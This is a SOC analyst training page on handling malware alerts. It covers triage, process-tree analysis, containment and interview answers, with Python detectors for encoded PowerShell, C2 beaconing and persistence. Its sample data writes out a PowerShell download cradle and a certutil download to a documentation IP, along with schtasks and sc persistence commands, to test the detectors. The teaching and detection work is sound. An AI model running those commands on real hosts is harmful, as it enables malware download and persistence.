
🦠 Malware Infection Alert

A malware detection is one of the most common and critical alerts in any SOC. It could be a blocked file, an active infection, or a living-off-the-land attack that bypasses traditional AV.

What triggers a malware alert?

Malware alerts originate from EDR tools (CrowdStrike, SentinelOne, Defender for Endpoint), antivirus engines, email sandboxes, or SIEM rules correlating suspicious process behavior. The alert might mean the malware was blocked, quarantined, or is actively running — you must establish which one first.


What to Check (SOC L1 Checklist)

Priority | Field | What You Are Looking For
🔴 First | Alert action | Was the file Blocked, Quarantined, or Allowed? If Allowed, treat as active.
🔴 First | Affected hostname & user | Who and what is impacted? Domain-joined? Admin account?
🟡 Second | File name & full path | Unusual paths such as %TEMP%, AppData\Roaming and ProgramData are red flags
🟡 Second | File hash (SHA-256) | Look up on VirusTotal, MalwareBazaar, Hybrid Analysis immediately. Search by hash; do not upload the file itself, since uploaded samples are shared and can leak internal data or tip off the attacker
🟡 Second | Parent process | What spawned the malicious file? winword.exe → powershell.exe = macro attack
🟠 Third | Command-line arguments | Look for encoded PowerShell, curl, certutil, or download cradles
🟠 Third | Network connections | Did the process phone home? What IPs/domains did it contact?
🟠 Third | Persistence mechanisms | Registry Run keys, scheduled tasks, services, startup folder entries
🟢 Fourth | Lateral movement indicators | SMB connections to other hosts, pass-the-hash, credential dumping

Investigation Workflow

Phase 1 — Immediate Triage (First 5 minutes)

  1. Check the EDR alert: was the file blocked/quarantined or allowed to execute?
  2. Look up the file hash on VirusTotal — community score, detection names, first seen date
  3. Check the process tree in the EDR — what parent process spawned the malware?
  4. Determine if the action is still in progress or already stopped
  5. Assess scope: one host or multiple?

Phase 2 — Deep Investigation (Next 15–30 minutes)

  • Process analysis: Review command lines, loaded DLLs, memory injections
  • Network analysis: Review all outbound connections — C2 callbacks, DNS lookups, beaconing patterns
  • File system: Check what files were created, modified, or deleted around the event time
  • Persistence: Check Registry Run keys, scheduled tasks, WMI subscriptions, services
  • Credential access: Check for LSASS access (credential dumping), SAM access, or Mimikatz artifacts
  • Lateral movement: Check for SMB or RPC connections from the infected host to other internal IPs
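The parent-process, command-line and file-path checks from the checklist and Phase 2, applied in code. This is an added example written for this page, not the page's own tooling or any EDR vendor's query language: the process events are constructed, and the field names (pid, ppid, image, cmdline) are an assumption rather than a real schema. It rebuilds the execution chain from parent PIDs, flags an Office application spawning a script host, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE), matches common LOLBin download cradles, and flags executables launched from user-writable paths.

```python
import base64
import ntpath
import re

# Constructed payload and process events for the example; no real telemetry or malware.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()  # how -EncodedCommand is built

# Field names (pid, ppid, image, cmdline) are an assumption, not any EDR vendor's schema.
PROCESS_EVENTS = [
    {"pid": 4000, "ppid": 1200, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\Invoice_2024.docm"'},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {ENC}"},
    {"pid": 4200, "ppid": 4100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\jdoe\AppData\Roaming\up.exe"},
    {"pid": 4300, "ppid": 4200, "image": r"C:\Users\jdoe\AppData\Roaming\up.exe", "cmdline": "up.exe"},
    {"pid": 5000, "ppid": 800, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
SUSPICIOUS_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\programdata\\", "\\windows\\temp\\")
CRADLES = [  # LOLBin download patterns named in the checklist
    (re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I), "certutil download"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "mshta remote HTA"),
    (re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I), "regsvr32 remote scriptlet"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin", re.I),
     "download cradle"),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def execution_chain(events, pid):
    """Walk ppid links upward and return image names from the root ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def triage(events):
    """Apply the checklist rules to each process event; returns (pid, rule, detail) tuples."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in OFFICE_APPS and child in SCRIPT_HOSTS:
            findings.append((e["pid"], "office-app spawned script host", f"{basename(parent['image'])} -> {child}"))
        decoded = decode_encoded_command(e["cmdline"])
        if decoded:
            findings.append((e["pid"], "encoded PowerShell", decoded))
        # Match cradles against the command line with the base64 blob masked, and against the decoded text.
        raw = ENCODED_ARG.sub("-EncodedCommand <b64>", e["cmdline"])
        for pattern, name in CRADLES:
            for text in (raw, decoded or ""):
                if pattern.search(text):
                    findings.append((e["pid"], name, text[:80]))
                    break
        if any(d in e["image"].lower() for d in SUSPICIOUS_DIRS):
            findings.append((e["pid"], "executable in user-writable path", e["image"]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(PROCESS_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
    print("chain:", " > ".join(execution_chain(PROCESS_EVENTS, 4300)))
```

The chain printed for the dropped binary (winword.exe > powershell.exe > certutil.exe > up.exe) is exactly what the escalation note to L2 should carry, alongside the decoded command and the contacted URL. Mask the base64 blob before pattern matching, as done above; otherwise a long base64 string can produce false matches on short keywords.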

Phase 3 — Containment

When to isolate

If the hash has a high VirusTotal score, the file executed, or there are signs of a C2 callback, isolate the host immediately via EDR. Do not power it off: network isolation keeps the attacker out while preserving volatile memory, running processes and in-memory artifacts that a shutdown would destroy.

  • Isolate the endpoint via EDR network isolation (CrowdStrike: Contain Host)
  • Block the hash globally (EDR custom IOC rule)
  • Block C2 IPs/domains at the firewall and proxy
  • Disable the compromised account if credential theft is suspected
  • Check all other endpoints for the same hash or process

Interview Questions & Answers

Q1. How do you handle a malware alert in the SOC?

"I start by checking whether the EDR blocked or allowed the file. If it was blocked, I still investigate to confirm there are no remnants. If it ran, I treat it as an active incident. I look up the file hash on VirusTotal, analyze the process tree in the EDR to see what spawned it, and check for network callbacks to a C2 server. If it's active and confirmed malicious, I isolate the host via EDR, block the IOCs globally, and escalate to L2 with my full findings."

Q2. What is a file hash and why do you check it on VirusTotal?

"A file hash is a fixed-length fingerprint — usually SHA-256 — generated from the file's contents. If even one byte changes, the hash changes completely. I submit it to VirusTotal because their platform aggregates the detection results from 70+ antivirus engines. A high detection score and a known malware family name give me confidence the file is malicious, even before I analyze it dynamically."

Q3. What is a process tree and why is it important?

"A process tree shows the parent-child relationships of running processes. In malware analysis it reveals the attack chain. For example, if winword.exe spawned powershell.exe which spawned cmd.exe, that tells me a malicious macro in a Word document executed a PowerShell download cradle. The process tree tells you the initial access vector and the full execution chain."

Q4. What does 'living off the land' mean?

"Living off the land (LotL) means the attacker uses legitimate, pre-installed system tools — like PowerShell, WMI, certutil, mshta, or regsvr32 — to carry out malicious actions. Because these are trusted binaries, signature-based AV often misses them. EDR behavioral detection is needed to catch these. Common LotL binaries are called 'LOLBins' — Living Off the Land Binaries."

Q5. When do you isolate a host, and when do you not?

"I isolate when the malware has executed and is confirmed malicious — especially if there are C2 callback signs, lateral movement, or credential dumping activity. I isolate via EDR network isolation rather than physically unplugging the machine or powering it off, because powering off destroys volatile memory and running processes. However, if the file was quarantined before it ran and there are no execution indicators, full isolation may not be necessary."

Q6. What is a C2 (Command and Control) server?

"A C2 or command-and-control server is infrastructure the attacker controls that the malware on a victim's machine connects to for instructions and data exfiltration. The malware 'beacons' back to the C2 at regular intervals. I check for C2 communication by looking at outbound DNS requests, HTTP/HTTPS connections to external IPs, and patterns like regular-interval beaconing in network logs."
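The regular-interval beaconing check described in the answer above, as an added example (not part of the original page and not a real tool's query). The log lines are constructed and use documentation IP ranges; the line format "<ISO time> <src> -> <dst>:<port>" is an assumption for the example. For each (source, destination, port) flow it computes the gaps between successive connections and flags flows whose gaps are both numerous and regular, measured as the coefficient of variation (standard deviation divided by mean); a malware beacon on a fixed sleep scores near zero, while human browsing scores near one.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy/firewall-style log lines (documentation IP ranges, not real traffic).
# 203.0.113.5 is contacted roughly every 60 s; 198.51.100.7 is irregular browsing; 192.0.2.9 is too rare to judge.
LOG = """\
2024-03-01T10:00:00 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:00:12 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:00:13 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:00:41 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:01:02 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:02:01 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:03:03 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:03:55 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:04:00 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:05:02 10.0.0.21 -> 203.0.113.5:443
2024-03-01T10:07:10 10.0.0.21 -> 192.0.2.9:80
2024-03-01T10:09:30 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:12:02 10.0.0.21 -> 198.51.100.7:443
2024-03-01T10:14:10 10.0.0.21 -> 192.0.2.9:80
"""
LINE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+)$")  # assumed log format


def parse_connections(text):
    """Group connection timestamps by (src, dst, port), sorted in time order."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        ts, src, dst, port = m.groups()
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    return {k: sorted(v) for k, v in flows.items()}


def beacon_candidates(text, min_connections=5, max_cv=0.2):
    """Flag flows whose inter-connection gaps are regular (low stdev/mean) and numerous enough to trust."""
    out = []
    for (src, dst, port), times in parse_connections(text).items():
        if len(times) < min_connections:
            continue  # too few samples to say anything about periodicity
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            out.append({"src": src, "dst": dst, "port": port, "count": len(times),
                        "mean_interval_s": round(mean, 1), "cv": round(cv, 3)})
    return out


if __name__ == "__main__":
    for hit in beacon_candidates(LOG):
        print(f"{hit['src']} -> {hit['dst']}:{hit['port']} every ~{hit['mean_interval_s']}s "
              f"({hit['count']} connections, cv={hit['cv']})")
```

Beacons that add deliberate jitter raise the coefficient of variation, so treat max_cv as a tuning knob rather than a fixed truth, and pair this check with destination reputation and the process that opened the connection. A single long-lived HTTPS session never shows up here at all, because there is only one connection to measure.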

Q7. How do you check if malware has spread to other machines?

"I search the SIEM and EDR for the same file hash, IP address, or domain name across all endpoints in the environment. I also check for lateral movement indicators on the originally infected host — SMB connections to other internal IPs, pass-the-hash attempts, or RDP sessions initiated from it. If the malware is a worm or has a lateral movement component, isolating one host without scope assessment leaves the rest exposed."

Q8. What persistence mechanisms do malware typically use?

"Common persistence mechanisms include: Registry Run keys that execute on login, scheduled tasks, Windows services installed by the malware, WMI subscriptions that trigger on events, startup folder entries, and DLL hijacking. I check all of these during investigation, and eradication must address every persistence mechanism — missing one means the malware comes back after the first reboot."
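The persistence checks listed in the answer above, run as detection logic over host telemetry. This is an added example for this page, not code from the page's author or from Sysmon: the events are constructed, but the event IDs and field names follow Sysmon's schema (1 process create, 11 file create, 13 registry value set, 20 WMI consumer activity). Each event is mapped to a mechanism (Run key, scheduled task, service, WMI subscription, startup folder) with the name and payload an analyst needs for eradication, and a legitimate installer writing a Run key is included so the user-writable-path heuristic has a benign case to pass.

```python
import re

# Constructed Sysmon-style events. Event IDs and field names follow Sysmon's schema; values are made up.
SYSMON_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\jdoe\AppData\Roaming\up.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\jdoe\AppData\Roaming\up.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "OneDrive Sync" /tr C:\ProgramData\up.exe /sc onlogon /ru SYSTEM'},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create WinHelpSvc binPath= "C:\ProgramData\up.exe" start= auto'},
    {"EventID": 20, "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Name": "EvilConsumer", "Type": "Command Line", "Destination": r"C:\ProgramData\up.exe"},
    {"EventID": 11, "Image": r"C:\Users\jdoe\AppData\Roaming\up.exe",
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\up.lnk"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\Setup.exe",  # benign installer, for contrast
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices)\\[^\\]+$", re.I)
SCHTASK = re.compile(r'schtasks(\.exe)?\s+/create\b.*?/tn\s+"?(?P<name>[^"/]+)"?', re.I)
TASK_ACTION = re.compile(r'/tr\s+("[^"]+"|\S+)', re.I)
SC_CREATE = re.compile(r"\bsc(\.exe)?\s+create\s+(?P<name>\S+)", re.I)
BINPATH = re.compile(r'binPath=\s*("[^"]+"|\S+)', re.I)
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def _unquote(s):
    return s.strip('"')


def _in_user_writable(path):
    p = path.lower()
    return any(d in p for d in USER_WRITABLE)


def classify(e):
    """Map one event to (mechanism, name, payload), or None if it is not a persistence artifact."""
    eid = e["EventID"]
    if eid == 13 and RUN_KEY.search(e["TargetObject"]):
        return ("registry run key", e["TargetObject"], e["Details"])
    if eid == 1:
        cmd = e["CommandLine"]
        m = SCHTASK.search(cmd)
        if m:
            tr = TASK_ACTION.search(cmd)
            return ("scheduled task", m.group("name").strip(), _unquote(tr.group(1)) if tr else "")
        m = SC_CREATE.search(cmd)
        if m:
            bp = BINPATH.search(cmd)
            return ("service", m.group("name"), _unquote(bp.group(1)) if bp else "")
    if eid == 20:
        return ("wmi subscription", e["Name"], e["Destination"])
    if eid == 11 and STARTUP.search(e["TargetFilename"]):
        return ("startup folder", e["TargetFilename"], e["TargetFilename"])
    return None


def _suspicious(mechanism, payload, writer):
    # The Startup folder itself lives under the user profile, so judge those entries by the process
    # that wrote them; for the rest, a payload or writer in a user-writable directory is the red flag.
    if mechanism == "startup folder":
        return _in_user_writable(writer)
    return _in_user_writable(payload) or _in_user_writable(writer)


def persistence_findings(events):
    """Return one finding per persistence artifact: what to remove, and whether it looks malicious."""
    out = []
    for e in events:
        hit = classify(e)
        if not hit:
            continue
        mechanism, name, payload = hit
        out.append({"mechanism": mechanism, "name": name, "payload": payload,
                    "writer": e["Image"], "suspicious": _suspicious(mechanism, payload, e["Image"])})
    return out


if __name__ == "__main__":
    for f in persistence_findings(SYSMON_EVENTS):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{flag}] {f['mechanism']}: {f['name']} -> {f['payload']} (written by {f['writer']})")
```

The output is effectively the eradication list: every row flagged suspicious has to be removed, and the five mechanisms here all point at the same dropped binary, which is the pattern the answer warns about. Missing any one of them brings the malware back at the next logon, task trigger, service start or WMI event.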

Q9. What is the difference between a virus, worm, and trojan?

"A virus attaches to an existing file and only spreads when a user executes that infected file. A worm is self-replicating — it spreads automatically across networks without user interaction, exploiting vulnerabilities like WannaCry did with SMB. A trojan disguises itself as legitimate software to trick users into installing it, then carries out a hidden malicious function. The key difference is their propagation mechanism."

Q10. How do you determine if an alert is a false positive?

"I look for evidence that the behavior was expected. For example, a security tool scanning the filesystem, an admin running a script with elevated privileges, or a development machine compiling code might trigger behavioral rules. I check the asset and user context, the alert history for that host, and whether the activity matches a known and approved pattern. If I can explain every artifact without a malicious alternative, it's likely a false positive — but I still document my reasoning."

Q11. What tools do you use to analyze a suspicious file?

"I use VirusTotal for static hash and reputation analysis, Any.run or Hybrid Analysis for dynamic sandbox detonation where I can watch the file execute in a safe environment, and PEStudio or Detect-It-Easy for static PE analysis of Windows executables. For deeper analysis I might use IDA Pro or Ghidra to disassemble the binary, though that's typically L3 reverse engineering work."

Q12. What is ransomware's relationship to malware?

"Ransomware is a category of malware. All ransomware is malware, but not all malware is ransomware. Ransomware specifically encrypts files or systems and demands payment for the decryption key. Modern ransomware attacks often involve a multi-stage infection — an initial dropper or RAT compromises the system first, performs reconnaissance, steals credentials and data, and then deploys the ransomware across the network in a final destructive stage."


Very Short Version (Easy to Remember)

  • Check the action first — Blocked vs. Allowed changes everything
  • Hash on VirusTotal — is it known malicious?
  • Process tree — what spawned it? (Word → PowerShell = macro attack)
  • Network callbacks — is it phoning home to a C2?
  • If active: isolate via EDR (not power off), block IOCs globally
  • Escalate with: hash, parent process, C2 IPs, scope, timeline